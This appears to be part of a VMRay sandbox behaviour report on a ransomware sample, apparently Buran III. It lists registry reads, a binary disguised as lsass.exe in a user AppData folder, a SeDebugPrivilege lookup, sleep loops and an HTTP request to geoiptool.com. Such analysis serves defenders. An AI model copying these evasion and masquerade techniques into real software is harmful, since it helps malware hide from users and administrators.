Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 737
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 3
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 76
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 381
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 16
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 552
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 20
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 303
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 151
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 187
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 323
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 224
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 85
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 25
Fn
Module (38)
»
Operation Module Additional Information Success Count Logfile
Load C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.ENU base_address = 0x0 False 1
Fn
Load C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.EN base_address = 0x0 False 1
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe base_address = 0x400000 True 7
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74eb0000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x74e20000 True 1
Fn
Get Filename c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 True 1
Fn
Get Filename C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.EN process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceExA, address_out = 0x74f4434f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VariantChangeTypeEx, address_out = 0x74e24c28 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNeg, address_out = 0x74e9c802 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNot, address_out = 0x74e9ec66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAdd, address_out = 0x74e45934 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarSub, address_out = 0x74e9d332 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMul, address_out = 0x74e9dbd4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDiv, address_out = 0x74e9e405 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarIdiv, address_out = 0x74e9f00a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMod, address_out = 0x74e9f15e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAnd, address_out = 0x74e45a98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarOr, address_out = 0x74e9ecfa True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarXor, address_out = 0x74e9ee2e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCmp, address_out = 0x74e3b0dc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarI4FromStr, address_out = 0x74e36fab True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR4FromStr, address_out = 0x74e401a0 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR8FromStr, address_out = 0x74e3699e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDateFromStr, address_out = 0x74e46ba7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCyFromStr, address_out = 0x74e66c12 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBoolFromStr, address_out = 0x74e3dbd1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrFromCy, address_out = 0x74e47fdc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrFromDate, address_out = 0x74e37a2a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrFromBool, address_out = 0x74e40355 True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Keyboard (1)
»
Operation Additional Information Success Count Logfile
Get Info type = 0, result_out = 4 True 1
Fn
System (3608)
»
Operation Additional Information Success Count Logfile
Sleep duration = 666 milliseconds (0.666 seconds) True 1
Fn
Sleep duration = 10 milliseconds (0.010 seconds) True 3091
Fn
Get Time type = Performance Ctr, time = 7452571001 True 1
Fn
Get Time type = Ticks, time = 31059 True 1
Fn
Get Time type = Performance Ctr, time = 8566897793 True 1
Fn
Get Time type = Performance Ctr, time = 8566903547 True 1
Fn
Get Time type = Performance Ctr, time = 8566908703 True 1
Fn
Get Time type = Performance Ctr, time = 8566913803 True 1
Fn
Get Time type = Performance Ctr, time = 8566918862 True 1
Fn
Get Time type = Performance Ctr, time = 8567259385 True 1
Fn
Get Time type = Performance Ctr, time = 8567264815 True 1
Fn
Get Time type = Performance Ctr, time = 8567269897 True 1
Fn
Get Time type = Performance Ctr, time = 8567274944 True 1
Fn
Get Time type = Performance Ctr, time = 8567280010 True 1
Fn
Get Info type = Operating System True 503
Fn
Get Info type = Operating System True 1
Fn
Environment (3)
»
Operation Additional Information Success Count Logfile
Get Environment String name = TEMP, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 2
Fn
Get Environment String name = WINDIR, result_out = C:\Windows True 1
Fn
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 39 bytes
Total Data Received 380 bytes
Contacted Host Count 1
Contacted Hosts 158.69.67.193
HTTP Session #1
»
Information Value
Server Name geoiptool.com
Server Port 80
Username -
Password -
Data Sent 39 bytes
Data Received 380 bytes
Operation Additional Information Success Count Logfile
Open Session access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = geoiptool.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1 True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://geoiptool.com True 1
Fn
Read Response size = 1024, size_out = 1024 True 19
Fn
Data
Read Response size = 1024, size_out = 818 True 1
Fn
Data
Read Response size = 1024, size_out = 0 True 1
Fn
Close Session - True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image